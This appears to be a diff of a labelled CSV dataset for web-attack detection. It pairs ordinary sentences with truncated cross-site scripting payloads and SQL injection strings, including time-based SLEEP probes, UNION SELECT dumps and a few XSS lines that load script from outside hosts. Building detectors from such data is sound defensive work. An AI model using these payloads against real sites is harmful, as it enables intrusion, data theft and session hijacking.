dbms_utility.sqlid_to_sqlhash ( ",2,SQLi,18175 +"<summary onmousedown=""alert(1)"">test</summary>",1,XSS,6317 +-9564 or 4144 = ( select upper ( xmltype ( chr ( 6,2,SQLi,12819 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3648 +"1 ) and 4241 = convert ( int, ( select char ( 113 ",2,SQLi,18163 +"<svg><script>x=""&quot;,alert(1)//"";</script></svg>",1,XSS,193 +1 or 5286 = ( select count ( * ) from all_users t1,2,SQLi,13417 +"<META HTTP-EQUIV=""Link"" Content=""<http://ha.ckers.",1,XSS,817 +select,0,normal,26565 +-7207' or 4747 = dbms_utility.sqlid_to_sqlhash ( (,2,SQLi,15813 +1' where 5547 = 5547,2,SQLi,21775 +"<cite draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,6163 +"1"" ) as wmng where 5976 = 5976",2,SQLi,15644 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,21338 +1 ) ) ) or ( select 9173 from ( select count ( * ),2,SQLi,19074 +<th id=x tabindex=1 onbeforedeactivate=alert(1)></,1,XSS,4393 +or sleep 5,2,SQLi,11167 +"<html onmousedown=""alert(1)"">test</html>",1,XSS,4930 +"<rp ondblclick=""alert(1)"">test</rp>",1,XSS,5555 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10802 +Select here.,0,normal,24481 +<svg><discard onbegin=alert(1)>,1,XSS,239 +"1"" ) as duvm where 6190 = 6190 order by 1--",2,SQLi,12210 +select,0,normal,26619 +1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AN,2,SQLi,11172 +Update the software on your mobile device.,0,normal,22905 +"<style onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,4239 +"<dl onkeyup=""alert(1)"" contenteditable>test</dl>",1,XSS,5621 +Where's the guesthouse?,0,normal,23549 +"<dfn onkeyup=""alert(1)"" contenteditable>test</dfn>",1,XSS,8643 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5100 +1' ) ) as yqek where 1957 = 1957,2,SQLi,14668 +<legend onpointerup=alert(1)>XSS</legend>,1,XSS,2244 +I'll order a tasty dessert.,0,normal,22995 +"<td onmouseup=""alert(1)"">test</td>",1,XSS,3555 +"1"" ) where 6809 = 6809 rlike ( select * from ( sel",2,SQLi,19392 +"1"" ) where 3250 = 3250 union all select null#",2,SQLi,19747 +"First up, is the ban on immigration from select co",0,normal,26192 +<li onfocusout=alert(1) tabindex=1 id=x></li><inpu,1,XSS,8331 +"< STYLE="":expression(alert(''))"">",1,XSS,5631 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10605 +1%' ) ) or 7417 = ( select count ( * ) from sysibm,2,SQLi,22170 +<u onpointerenter=alert(1)>XSS</u>,1,XSS,4510 +The Galaxy S10 phones also support select decentra,0,normal,25439 +-2120' ) or 8734 = 8844#,2,SQLi,12177 +"1 ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 1",2,SQLi,14456 +1'+ ( select sxco where 1623 = 1623 union all sele,2,SQLi,16533 +"1%"" ) or 6979 = like ( 'abcdefg',upper ( hex ( ran",2,SQLi,15096 +I'm considering where to go for a leisurely stroll,0,normal,23777 +"<dt draggable=""true"" ondragend=""alert(1)"">test</dt",1,XSS,2296 +select * from users where id = 1 +\. union select ,2,SQLi,11806 "{""id"":null,""name"":""did""}",0,normal,27396 -The House Permanent Select Committee on Intelligen,0,normal,25430 -"1"" ) where 9770 = 9770 union all select null,null,",2,SQLi,14319 -Where did they go?,0,normal,23481 -end and ( ( ( 'ycte' = 'ycte,2,SQLi,21114 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8691 -"<style>@keyframes x{}</style><del style=""animation",1,XSS,7082 -"<ruby draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,4734 -"<style>@keyframes slidein {}</style><tt style=""ani",1,XSS,8913 --6039%' ) ) or 6872 = 6872 and ( ( '%' = ',2,SQLi,20769 --5751 ) as jybu where 4739 = 4739 or 2724 in ( ( c,2,SQLi,13046 -Insert your contact information in the form.,0,normal,22922 -""" - Under ""Past Payments"" select ""Change All to Pr",0,normal,26480 -||(SELECT 0x727a5277 FROM DUAL WHERE 1337=1337 AND,2,SQLi,11282 -1' ) ) and 3580 = ( select count ( * ) from domain,2,SQLi,14956 -Please unban with and ignore all lame excuses of P,0,normal,26482 -"-9737"" ) ) ) order by 1--",2,SQLi,20930 -1' ) and 3707 = ( select count ( * ) from sysibm.s,2,SQLi,16981 -Amazon slashed prices on select items at Whole Foo,0,normal,26375 -or 3 = 3,2,SQLi,11511 -"<wbr onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,5521 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,21549 -"""While Secretary Clinton has testified before comm",0,normal,26444 -1' ) where 6214 = 6214 procedure analyse ( extract,2,SQLi,18032 -select * from users where id = 1 or ( \ ) = 1 unio,2,SQLi,11822 -"<script oncut=""alert(1)"" contenteditable>test</scr",1,XSS,2701 -"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><!",1,XSS,1701 -"-5439"" or 2559 = 4692 and ""dcrf"" like ""dcrf",2,SQLi,13597 -"1' ) and 3202 = like ( 'abcdefg',upper ( hex ( ran",2,SQLi,19158 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6969 -"Scroll down a bit until you see ""FaceTime"" and sel",0,normal,25702 -1'+ ( select 'qzcx' where 9524 = 9524 and elt ( 30,2,SQLi,16323 -"<label onmouseup=""alert(1)"">test</label>",1,XSS,6220 -Select items where available.,0,normal,23452 +The IMF plans to select its new head by Oct. 4.,0,normal,25427 +"1 ) ) union all select null,null,null,null,null,nu",2,SQLi,14321 +Where did you find it?,0,normal,23478 +"select sleep ( 5 ) and ( ( ( ""uvzc"" like ""uvzc",2,SQLi,21116 +"<li draggable=""true"" ondrag=""alert(1)"">test</li>",1,XSS,8693 +"<textarea onkeydown=""alert(1)"" contenteditable>tes",1,XSS,7084 +"<meter draggable=""true"" ondragleave=""alert(1)"">tes",1,XSS,4736 +<style>:target {color:red;}</style><pre id=x style,1,XSS,8915 +1 ) where 1487 = 1487,2,SQLi,20771 +1 where 4844 = 4844,2,SQLi,13048 +Update your wardrobe with new clothes.,0,normal,22919 +""" From there, press ""Background App Refresh"" and s",0,normal,26477 +||(SELECT 0x57556971 FROM DUAL WHERE 1337=1337 AND,2,SQLi,11284 +"select pg_sleep ( 5 ) and ""%"" = """,2,SQLi,14958 +""" Applicants are not allowed to select ""all of the",0,normal,26479 +"1"" ) ) ) rlike ( select * from ( select ( sleep ( ",2,SQLi,20932 +"-7295"" ) or 9323 = 9323#",2,SQLi,16983 +An English translation of the embassy to Constanti,0,normal,26372 +select * from users where id = 1 or ( $+ ) = 1 or ,2,SQLi,11513 +<dl id=x tabindex=1 onactivate=alert(1)></dl>,1,XSS,5523 +1' in boolean mode ) or 8156 = ( select count ( * ,2,SQLi,21551 +A common practice is to switch to palette color mo,0,normal,26441 +1'|| ( select 'osux' from dual where 7066 = 7066 o,2,SQLi,18034 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11824 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2702 +"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTY",1,XSS,1702 +-6030%' ) or 3038 = 3038,2,SQLi,13599 +1 ) and 3861 = 5813--,2,SQLi,19160 +<sub id=x tabindex=1 onactivate=alert(1)></sub>,1,XSS,6971 +"Scroll down on the menu and select ""Send a copy.""",0,normal,25699 +"1%"" ) ) ) rlike ( select ( case when ( 7689 = 7689",2,SQLi,16325 +"<del onmouseover=""alert(1)"">test</del>",1,XSS,6222 +"{""id"":null,""firstName"":""勤生"",""lastName""",0,normal,27475 <xss onpointerdown=alert(1) style=display:block>XS,1,XSS,87 -You want to make sure the camera you select will b,0,normal,25063 -Select your shift.,0,normal,25037 -"1%"" and 2805 = 1345",2,SQLi,18979 -"1"" where 4298 = 4298 order by 1--",2,SQLi,15347 -1' ) ) as dqdv where 8126 = 8126 and 4595 = 4595#,2,SQLi,17414 +You will be performing many quick stops and starts,0,normal,25060 +"{""id"":null,""firstName"":""Adeline"",""lastName"":""Yong""",0,normal,26845 +"1"" ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,18981 +1 ) and 8312 = dbms_pipe.receive_message ( chr ( 6,2,SQLi,15349 +"1"" ) where 1300 = 1300 order by 1#",2,SQLi,17416 <svg onload=alert(1),1,XSS,137 -"<noembed draggable=""true"" ondragend=""alert(1)"">tes",1,XSS,6973 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11088 -1 where 5700 = 5700,2,SQLi,19239 -"1"" or exp ( ~ ( select * from ( select concat ( 0x",2,SQLi,15722 -"<IMG SRC=x onmousemove=""alert(String.fromCharCode(",1,XSS,1201 -"<style oncut=""alert(1)"" contenteditable>test</styl",1,XSS,6122 --7779' ) where 4976 = 4976 or 6872 = 6872--,2,SQLi,15749 -"-1064' or make_set ( 6439 = 2937,2937 ) and 'qojd'",2,SQLi,12128 -I'll select my shoes.,0,normal,24319 -1 where 8393 = 8393,2,SQLi,14126 -1 where 2823 = 2823 and 3707 = ( select count ( * ,2,SQLi,13623 -<script id=x tabindex=1 ondeactivate=alert(1)></sc,1,XSS,6297 -<dialog onpointerdown=alert(1)>XSS</dialog>,1,XSS,3928 -1'+ ( select 'kicv' where 1976 = 1976 and 3754 = (,2,SQLi,14388 -"In Settings, scroll to find and select Display & B",0,normal,26001 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3607 -"1"" rlike ( select * from ( select ( sleep ( 5 ) ) ",2,SQLi,21226 -<rp onpointermove=alert(1)>XSS</rp>,1,XSS,2331 -select * from users where id = 1 or $<\. union sel,2,SQLi,11708 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2188 +<style>:target {transform: rotate(180deg);}</style,1,XSS,6975 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11090 +"-4802 union all select 7381,7381,7381,7381,7381,73",2,SQLi,19241 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,15724 +"<IMG SRC=x onmouseout=""alert(String.fromCharCode(8",1,XSS,1202 +"<marquee onmousedown=""alert(1)"">test</marquee>",1,XSS,6124 +select ( case when ( 7645 = 5921 ) then 7645 else ,2,SQLi,15751 +1%' ) ) ) or exp ( ~ ( select * from ( select conc,2,SQLi,12130 +Select the top talent.,0,normal,24316 +"1%"" or 5286 = ( select count ( * ) from all_users ",2,SQLi,14128 +-3026 ) or 4493 = utl_inaddr.get_host_address ( ch,2,SQLi,13625 +"<br onmouseover=""alert(1)"">test</br>",1,XSS,6299 +"<center oncontextmenu=""alert(1)"">test</center>",1,XSS,3930 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,14390 +"In the ""Account"" tab, select ""Remove accounts"" and",0,normal,25998 +<command id=x tabindex=1 onfocus=alert(1)></comman,1,XSS,3609 +-6190' ) where 2621 = 2621 or 4144 = ( select uppe,2,SQLi,21228 +<image onpointerenter=alert(1)>XSS</image>,1,XSS,2332 +select * from users where id = 1 or \.<$ or 1 = 1 ,2,SQLi,11710 +<style>:target {color: red;}</style><rt id=x style,1,XSS,2189 "<a href=""j&#x61vascript:alert(1)"">XSS</a>",1,XSS,196 -"1%"" ) ) and 8635 = ( select count ( * ) from gener",2,SQLi,12357 --8612' ) as toeu where 6357 = 6357 or 1570 = conve,2,SQLi,21444 -1'+ ( select 'fxhh' where 2571 = 2571 union all se,2,SQLi,17187 -"-6305"" ) ) ) or 8097 = 2048 and ( ( ( ""euyy"" like ",2,SQLi,15955 -"1' ) or extractvalue ( 1297,concat ( 0x5c,0x717170",2,SQLi,14639 -"<head draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,2669 -"1%"" ) and elt ( 7436 = 9874,9874 ) and ( ""%"" = """,2,SQLi,16626 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,18453 -1%' ) ) ) waitfor delay '0:0:5' and ( ( ( '%' = ',2,SQLi,15196 -<td id=x tabindex=1 onactivate=alert(1)></td>,1,XSS,2762 -<textarea autofocus onfocus=alert(1)>test</textare,1,XSS,2033 -"1"" ) where 6821 = 6821 waitfor delay '0:0:5'--",2,SQLi,17029 -<em id=x tabindex=1 onfocusin=alert(1)></em>,1,XSS,5104 -1' in boolean mode ) and 9660 = ( select count ( *,2,SQLi,13653 -<;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x,1,XSS,1638 -<slot onpointerout=alert(1)>XSS</slot>,1,XSS,8313 -AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ,2,SQLi,11174 -Select colors that match the teddy bear you choose,0,normal,25640 -<progress id=x tabindex=1 onbeforeactivate=alert(1,1,XSS,3075 -<rt onblur=alert(1) tabindex=1 id=x></rt><input au,1,XSS,7297 -<samp id=x tabindex=1 onactivate=alert(1)></samp>,1,XSS,3279 -"<data ondblclick=""alert(1)"">test</data>",1,XSS,8004 -"1"" ) as eoer where 8667 = 8667 or 6793 = ( select ",2,SQLi,21355 -Aggregate data where applicable.,0,normal,23352 -<select id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,8327 --6588' where 7793 = 7793 or ( 8459 = 8459 ) *4906-,2,SQLi,13517 -<nobr onpointerup=alert(1)>XSS</nobr>,1,XSS,7353 --6370' ) ) as sims where 9388 = 9388 union all sel,2,SQLi,13451 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10752 -"<h1 onmouseout=""alert(1)"">test</h1>",1,XSS,7830 -1 or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,16447 -"<slot onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,7698 --2452' ) ) ) union all select 1951--,2,SQLi,14428 -"<samp draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,5669 -Select the best hiking trail to explore.,0,normal,24138 -"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10660 --7874 ) ) ) or 2724 in ( ( char ( 113 ) +char ( 11,2,SQLi,17064 -"-3109"" or elt ( 1032 = 1032,3623 )",2,SQLi,18426 -<area onpointerleave=alert(1)>XSS</area>,1,XSS,8934 -<plaintext id=x tabindex=1 onactivate=alert(1)></p,1,XSS,5308 -I need to select the right paint colors for the ro,0,normal,23861 -1' ) ) ) or ( select 9173 from ( select count ( * ,2,SQLi,20026 -Select your investigate.,0,normal,24989 -1' ) ) as ylyq where 2953 = 2953 and 2716 = ( sele,2,SQLi,19643 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,12856 -"1' ) and row ( 6237,7469 ) > ( select count ( * ) ",2,SQLi,18258 -1'+ ( select 'yfrs' where 4388 = 4388 and 9254 = (,2,SQLi,21129 -"-9240' union all select 6538,6538,6538#",2,SQLi,19297 -"))) and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,11036 -1' ) ) ( select ( case when ( 5451 = 5451 ) then r,2,SQLi,20412 -<title onpointerleave=alert(1)>XSS</title>,1,XSS,5489 -"1"" ) ) as nejd where 2885 = 2885",2,SQLi,16679 -<strong onpointerover=alert(1)>XSS</strong>,1,XSS,8025 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6",2,SQLi,10749 -1 or 4915 = ( select count ( * ) from domain.domai,2,SQLi,16874 +"1"" ) ) or exp ( ~ ( select * from ( select concat ",2,SQLi,12359 +"-5193 where 2175 = 2175 union all select 2175,2175",2,SQLi,21446 +select ( case when ( 7990 = 7627 ) then 7990 else ,2,SQLi,17189 +1%' ( select ( case when ( 4587 = 4587 ) then rege,2,SQLi,15957 +"1"" ) ) and 9660 = ( select count ( * ) from all_us",2,SQLi,14641 +<bgsound onpointermove=alert(1)>XSS</bgsound>,1,XSS,2670 +1' ) or 4411 = ( select count ( * ) from sysusers ,2,SQLi,16628 +"1"" and 2006 = 2006",2,SQLi,18455 +"-1807' ) ) union all select 9853,9853,9853,9853,98",2,SQLi,15198 +<hr onpointerup=alert(1)>XSS</hr>,1,XSS,2763 +"<bdo ondblclick=""alert(1)"">test</bdo>",1,XSS,2034 +select case when 5308 = 6745 then 1 else null end-,2,SQLi,17031 +<br id=x tabindex=1 onfocusin=alert(1)></br>,1,XSS,5106 +1 ) where 6494 = 6494,2,SQLi,13655 +"<;HEAD>;<;META HTTP-EQUIV="";CONTENT-TYPE""; CONTENT",1,XSS,1639 +<textarea onchange=alert(1)>XSS</textarea>,1,XSS,8315 +) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- ,2,SQLi,11176 +Select Comfort – Select Comfort reported quarterly,0,normal,25637 +"<code onkeypress=""alert(1)"" contenteditable>test</",1,XSS,3076 +<nobr onpointerout=alert(1)>XSS</nobr>,1,XSS,7299 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3281 +"<style>@keyframes x{}</style><hr style=""animation-",1,XSS,8006 +"1"" ) ) ) and 9254 = ( select count ( * ) from rdb$",2,SQLi,21357 +Fetch records where required.,0,normal,23349 +<dir onpointerout=alert(1)>XSS</dir>,1,XSS,8329 +1'|| ( select 'miew' where 8360 = 8360 waitfor del,2,SQLi,13519 +<style>:target {color: red;}</style><area id=x sty,1,XSS,7355 +-8341 or 8571 = 8571--,2,SQLi,13453 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10754 +"<iframe onclick=""alert(1)"">test</iframe>",1,XSS,7832 +"1' ) ) union all select null,null#",2,SQLi,16449 +"<b draggable=""true"" ondragend=""alert(1)"">test</b>",1,XSS,7700 +1' ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121,2,SQLi,14430 +"<details oncontextmenu=""alert(1)"">test</details>",1,XSS,5671 +Where's the palace?,0,normal,23565 +"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10662 +1' ) where 1470 = 1470 and char ( 111 ) ||char ( 7,2,SQLi,17066 +"1' procedure analyse ( extractvalue ( 9255,concat ",2,SQLi,18428 +"<h1 onmouseup=""alert(1)"">test</h1>",1,XSS,8936 +<style>:target {color: red;}</style><section id=x ,1,XSS,5310 +Can you help me decide where to go for dinner?,0,normal,23858 +"1 ) where 3915 = 3915 union all select null,null,n",2,SQLi,20028 +Select your spy.,0,normal,24986 +"-5438"" ) union all select 3170,3170--",2,SQLi,19645 +-3071 ) ) as uiiu where 8910 = 8910 union all sele,2,SQLi,12858 +"-3059 or 1570 = convert ( int, ( select char ( 113",2,SQLi,18260 +"1%"" or 6979 = like ( 'abcdefg',upper ( hex ( rando",2,SQLi,21131 +"1' ) where 9381 = 9381 or elt ( 6272 = 6272,sleep ",2,SQLi,19299 +")))) and 0=benchmark(3000000,MD5(1))%20--",2,SQLi,11038 +1 where 6095 = 6095 and 8407 = ( select count ( * ,2,SQLi,20414 +<svg><span onload=alert(1)></span>,1,XSS,5491 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,16681 +<hr onpointermove=alert(1)>XSS</hr>,1,XSS,8027 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10751 +( select ( case when ( 5603 = 5603 ) then 5603 els,2,SQLi,16876 "<script src=""/\%(jscript)s""></script>",1,XSS,691 -select * from users where id = 1 union select @ $$,2,SQLi,12014 -"-9237' ) union all select 7454,7454,7454,7454,7454",2,SQLi,16987 -) union select * from information_schema.tables;,2,SQLi,10104 +"1 ) ) or benchmark ( 10000000,MD5 ( 1 ) ) #",2,SQLi,12016 +if ( 6842 = 5446 ) select 6842 else drop function ,2,SQLi,16989 +"or ""a""=""a",2,SQLi,10106 "&lt;BASE HREF=\""javascript&#058;alert('XSS');//\""&",1,XSS,1015 <iframe/%00/ src=javaSCRIPT&colon;alert(1),1,XSS,870 -<col id=x tabindex=1 onactivate=alert(1)></col>,1,XSS,1994 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10627 -"select * from users where id = 1 or "" ( _"" or 1 = ",2,SQLi,11950 -1'|| ( select 'xqqp' where 3007 = 3007 and ( selec,2,SQLi,14840 --7611 ) as tuje where 6101 = 6101 union all select,2,SQLi,14925 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10559 -<iframe onpointermove=alert(1)>XSS</iframe>,1,XSS,7611 -"<dt onmouseout=""alert(1)"">test</dt>",1,XSS,5284 -"<hr oncontextmenu=""alert(1)"">test</hr>",1,XSS,4371 -"<BODY ONLOAD=alert(""XSS"")>",1,XSS,1362 -"1%' ) and make_set ( 1458 = 3902,3902 ) and ( '%' ",2,SQLi,17911 -"<;!--#exec cmd="";/bin/echo ';<;SCRIPT SRC';"";-->;<",1,XSS,1630 -"1"" ) ) ) or 9643 = ( select count ( * ) from domai",2,SQLi,12626 -"<HTML xmlns:xss><?import namespace=""xss"" implement",1,XSS,1552 -1 ) ) or 5286 = ( select count ( * ) from all_user,2,SQLi,20811 -"{""id"":null,""name"":""Charizard""}",0,normal,27195 -"1"" where 4652 = 4652 and 3202 = like ( 'abcdefg',u",2,SQLi,17722 -"1 ) ) ) and row ( 6237,7469 ) > ( select count ( *",2,SQLi,20286 -1 ) as rqac where 3381 = 3381 and 6240 = ( 'qqpjq',2,SQLi,21426 -"<sup oncopy=""alert(1)"" contenteditable>test</sup>",1,XSS,8253 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10443 -select ( case when ( 7271 = 1658 ) then 7271 else ,2,SQLi,14632 -Let's explore where the forest begins.,0,normal,23672 -<template id=x tabindex=1 onactivate=alert(1)></te,1,XSS,5040 --7720 ) ) or 2724 in ( ( char ( 113 ) +char ( 113 ,2,SQLi,18731 -1,0,normal,26649 -1' ) as irck where 3660 = 3660 or ( select * from ,2,SQLi,21870 -If Beale Street Could Talk hits select theaters on,0,normal,26059 -<bgsound onpointerover=alert(1)>XSS</bgsound>,1,XSS,5695 -"<frame draggable=""true"" ondrag=""alert(1)"">test</fr",1,XSS,5120 -1' in boolean mode ) or 8156 = ( select count ( * ,2,SQLi,21551 -“><<script>alert(document.cookie);//<</script>,1,XSS,1135 -"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,10997 -ORDER BY 6#,2,SQLi,10279 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10452 -<style>:target {color: red;}</style><bdi id=x styl,1,XSS,4018 -#ERROR!,2,SQLi,10410 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2425 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4139 -select * from users where id = 1 or ( 1 ) = 1 unio,2,SQLi,12049 -<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar,1,XSS,860 -"<dialog oncopy=""alert(1)"" contenteditable>test</di",1,XSS,2963 -"<nobr oncopy=""alert(1)"" contenteditable>test</nobr",1,XSS,2427 -"Select the ""Mute"" option at the very top of the ne",0,normal,25602 -"-3541"" or make_set ( 9354 = 9354,7185 ) and ""fgxu""",2,SQLi,17749 -"<shadow onkeyup=""alert(1)"" contenteditable>test</s",1,XSS,7675 -"1%"" ) ) ) or exp ( ~ ( select * from ( select conc",2,SQLi,18164 -1 and 7533 = 7533# absp,2,SQLi,19875 -"""We evaluate to develop, not just to select player",0,normal,26447 -"1 and 4241 = convert ( int, ( select char ( 113 ) ",2,SQLi,18486 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,18203 -"iif ( 5571 = 4947,1,1/0 )",2,SQLi,16754 -<content onfocusout=alert(1) tabindex=1 id=x></con,1,XSS,4938 -",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%",2,SQLi,10897 +<p id=x tabindex=1 onfocusin=alert(1)></p>,1,XSS,1995 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10629 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11952 +"-5300' union all select 2750,2750,2750,2750,2750,2",2,SQLi,14842 +"-5625"" union all select 6087,6087,6087,6087,6087,6",2,SQLi,14927 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10561 +"<pre oncopy=""alert(1)"" contenteditable>test</pre>",1,XSS,7613 <animate onpointerleave=alert(1)>XSS</animate>,1,XSS,5286 -<style>@keyframes slidein {}</style><noscript styl,1,XSS,8368 -"iif ( 1157 = 4542,1,1/0 )",2,SQLi,12906 -"<script onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,2094 -The Israelites were commanded to select on the ten,0,normal,25422 -1') AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND (',2,SQLi,11337 -AND 1 = utl_inaddr.get_host_address ( ( SELECT COU,2,SQLi,11684 -"<base ondblclick=""alert(1)"">test</base>",1,XSS,7818 -header('Location: '.$_GET['param']);,1,XSS,1921 +"<slot draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,4373 +<IFRAME SRC=”http://hacker-site.com/xss.html”>,1,XSS,1363 +"1%' ) ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,17913 +"<;BR SIZE="";&;{alert(';XSS';)}"";>;",1,XSS,1631 +"-7416"" where 7656 = 7656 order by 1--",2,SQLi,12628 +"<script SRC=""http://www.securitycompass.com/xss.jp",1,XSS,1553 +-7435' ) where 6242 = 6242 or 4493 = utl_inaddr.ge,2,SQLi,20813 +"{""id"":null,""firstName"":""Ivy"",""lastName"":""Lim"",""spe",0,normal,27193 +1'|| ( select 'ywjy' where 7579 = 7579,2,SQLi,17724 +"-6587' ) union all select 6349,6349,6349,6349,6349",2,SQLi,20288 +"1' ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ",2,SQLi,21428 +"<listing onmousedown=""alert(1)"">test</listing>",1,XSS,8255 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10445 +"1 where 1153 = 1153 or extractvalue ( 1297,concat ",2,SQLi,14634 +I'm considering where to go for a jog.,0,normal,23669 +"<u onbeforecut=""alert(1)"" contenteditable>test</u>",1,XSS,5042 +"1, ( select ( case when ( 5154 = 5154 ) then 1 els",2,SQLi,18733 +1,0,normal,26646 +1'+ ( select 'vedi' where 2774 = 2774 and 9660 = (,2,SQLi,21872 +"If none of these options suit you, you can select ",0,normal,26056 +"<strike onmouseleave=""alert(1)"">test</strike>",1,XSS,5697 +<font onpointerup=alert(1)>XSS</font>,1,XSS,5122 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,21553 +foo<script>alert(document.cookie)</script>,1,XSS,1136 +#ERROR!,2,SQLi,10999 +ORDER BY 8#,2,SQLi,10281 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10454 +"<th ondblclick=""alert(1)"">test</th>",1,XSS,4020 +"AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000",2,SQLi,10412 +<style>:target {transform: rotate(180deg);}</style,1,XSS,2426 +"<menuitem onmouseup=""alert(1)"">test</menuitem>",1,XSS,4141 +select * from users where id = '1' + @ 1! union se,2,SQLi,12051 +<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar,1,XSS,860 +<svg><table onload=alert(1)></table>,1,XSS,2964 +"<template onkeypress=""alert(1)"" contenteditable>te",1,XSS,2428 +"Select the cell that contains the drop-down list, ",0,normal,25599 +"-4350"" ) ) as mmwq where 9801 = 9801 or ( 8520 = 2",2,SQLi,17751 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7677 +"1"" ) ) as tpeh where 6306 = 6306 and 5965 = 5806#",2,SQLi,18166 +-7277 ) ) ) order by 1#,2,SQLi,19877 +"""While Secretary Clinton has testified before comm",0,normal,26444 +"-5640"" ) ) or 9792 = 2728--",2,SQLi,18488 +"1"" ) ) as xcyo where 2929 = 2929",2,SQLi,18205 +1' ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 1,2,SQLi,16756 +"<wbr onkeypress=""alert(1)"" contenteditable>test</w",1,XSS,4940 +""",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay",2,SQLi,10899 +"<menuitem onmousedown=""alert(1)"">test</menuitem>",1,XSS,5288 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8370 +1 and ( 3020 = 3020 ) *6703# syuj,2,SQLi,12908 +<div onpointermove=alert(1)>XSS</div>,1,XSS,2095 +"The Kinto Select service costs 180,000 yen, or $1,",0,normal,25419 +1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR,2,SQLi,11339 +""" or """" """,2,SQLi,11686 +"<map ondblclick=""alert(1)"">test</map>",1,XSS,7820 +"<slot oncontextmenu=""alert(1)"">test</slot>",1,XSS,1922 <video onmozfullscreenchange=alert(1) src=validvid,1,XSS,83 -"1' ) ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,17201 -1'|| ( select 'xhcr' from dual where 9279 = 9279,2,SQLi,13319 -"{""id"":null,""firstName"":""Tao"",""lastName"":""Ming"",""ad",0,normal,26902 -<dfn onpointerup=alert(1)>XSS</dfn>,1,XSS,4397 -<rb id=x tabindex=1 ondeactivate=alert(1)></rb><in,1,XSS,8476 -select current_setting('virtual_host');,2,SQLi,22509 -1' ) as myxr where 6299 = 6299 and char ( 111 ) ||,2,SQLi,20505 -1' ) where 8707 = 8707 and 3210 = 